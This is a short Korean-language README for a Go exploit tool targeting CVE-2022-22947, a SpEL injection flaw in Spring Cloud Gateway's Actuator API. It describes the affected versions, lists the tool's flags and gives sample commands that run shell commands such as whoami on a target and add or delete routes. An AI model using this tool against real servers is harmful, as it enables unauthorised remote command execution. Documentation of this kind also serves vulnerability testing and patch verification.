
Spring Cloud Gateway의 SpEL 주입 취약점인 CVE-2022-22947에 대한 Go 기반 익스플로잇으로, Actuator API를 통해 원격 명령 실행을 가능하게 합니다.
Spring Cloud Gateway는 Spring의 API 게이트웨이입니다. 3.1.0 및 3.0.6(포함) 이전 버전에는 SpEL 표현식 주입 취약점이 존재하며, 공격자가 Actuator API에 접근할 수 있는 경우 이 취약점을 이용하여 임의의 명령을 실행할 수 있습니다.
사용법:
➜ ./cve-2022-22947 -h
Usage of cve-2022-22947:
-c string
Execute command, Example: whoami (default "id")
-d Delete route.
-r string
New route name
-u string
Target Url, Example: http://127.0.0.1:8080
# example
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -c whoami -r exploit.
[>] Usage: ./CVE-2022-22947 -u http://127.0.0.1:8080 -r exploit -d
발생한 문제: https://darkb1rd.github.io/2022/03/07/yuque/cve-2022-22947%20%E5%B0%8F%E7%82%B9/